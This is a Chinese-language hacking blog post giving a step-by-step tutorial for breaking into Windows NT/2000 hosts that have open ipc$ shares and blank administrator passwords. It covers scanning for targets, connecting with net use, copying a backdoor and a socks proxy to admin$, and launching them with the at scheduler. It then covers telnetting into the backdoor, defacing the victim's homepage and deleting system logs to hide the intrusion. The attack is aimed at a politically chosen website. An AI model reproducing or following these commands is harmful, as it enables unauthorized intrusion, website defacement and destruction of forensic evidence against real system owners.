NT的简单攻击(II)流光攻击ipc$主机

NT的简单攻击(II)流光攻击ipc$主机
 
 

<script language="javascript" src="/ads/tech78_body1.js" type="text/javascript"></script>

最近很懒,好长时间没写原创了,今天写个流光攻击ipc$的主机吧,可能有的朋友要问攻击ipc$的主机与QQ有什么关系呢?呵呵,一会你就知道了
  首先用流光扫描一段ip,目标,台独分子网站,ipc是什么?你也太差了,连这个都不知道,ipc是进程间通信呗,是连接server到server之间通信用的,ipc$也就是win2k默认开的共享,唉呀,不说了,只要你知道有这个ipc就行了。
一会儿,流光扫描完毕,询问是否查看入侵报告,确定,哈哈,扫到了不少ipc$的主机,随便拿来个user:administrator(admin) password:(null)的主机,(如图)



呵呵,这个administrator还是超级权限呢,你问我是怎么知道的?拷,流光告诉我的呗,user:administrator(admin)这个(admin)就是说明administrator这个用户具有超级权限!不废话了,既然用户名,密码知道了,那就开始工作吧,打开开始--附件--c命令提示符,也就是cmd,在c:/下输入net use //x.x.x.x/ipc$ /user:"administrator"回车。显示密码和用户名在//x.x.x.x/ipc$上无效,请键入 //x.x.x.x/ipc$的用户名和密码。刚才我们看到的密码不是null吗?只要敲一下回车就可以了,显示命令成功完成,(如图)


现在我们要做的是copy几个exe到肉机下,输入copy f:/a/srv.exe //x.x.x.x/admin$显示已复制一个文件。copy f:/a/sksockserver.exe //x.x.x.x/admin$显示已复制一个文件,这样我们就将这两个exe复制到肉机的c:/winnt目录下了,现在我们用at命令来启动srv.这个后门,登陆到肉机的99端口,先用net time //x.x.x.x 查看一下远程服务器的时间,显示//x.x.x.x当前时间是2002/1/1 下午 2:00, 输入at //x.x.x.x 14:02 srv.exe显示新加了一项作业 其作业id=1.也就是说在14:02的时侯启动这个srv.好,倒计时开始,3.2.1.时间到,输入telnet x.x.x.x 99回车。哈哈,进去了,是否对方的c:/winnt/system32提示符出现了.开始安装刚刚拷贝过去的sksockserver.exe吧!啊?cmd打不字了?盲操做,发挥发挥你丰富的想像力吧,输入sksockserver.exe -install 显示snake sockproxy service installed 启动它,net start skserver 显示snake sockproxy service (如图)


另外,既然你现在是这台主机上的webmaster,你还可以干点别的吧,可以开个后门,以后干活方便,里应外合,copy个木马,用小马马控制他, 黑他的主页,主页一般在c:/inetpub/wwwroot目录下,一般默认文件名为index.htm default.htm。index.asp default.asp.以我的经验:主页放在默认目录的很少,告诉你一个小窍门,主页一般不都有返回道页这一栏吗?你把鼠标放在上面就可以看到他的主页路径了,找到最后的文件名,比如最后的文件名叫default.asp 用dir default.asp/s命令在每一个盘符下查找,找到之后用一下ren default.asp default.ccb 然后在刷新一下url.看看是否找不到主页了,如果找不到此页就对了!找到文件后就可以在dos下传主页了。 copy f:/index.htm //x.x.x.x/c$/inetpub/wwwroot下,覆盖原文件就可以了,这里我就不在赘述了!(如图) 


最后别忘了DEL掉日志。 我个人建议……要抹就抹个干净……只要是在C:\WINNT\SYSTEM32\LOGFILES下的*.*,全部删掉!~~~

 
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值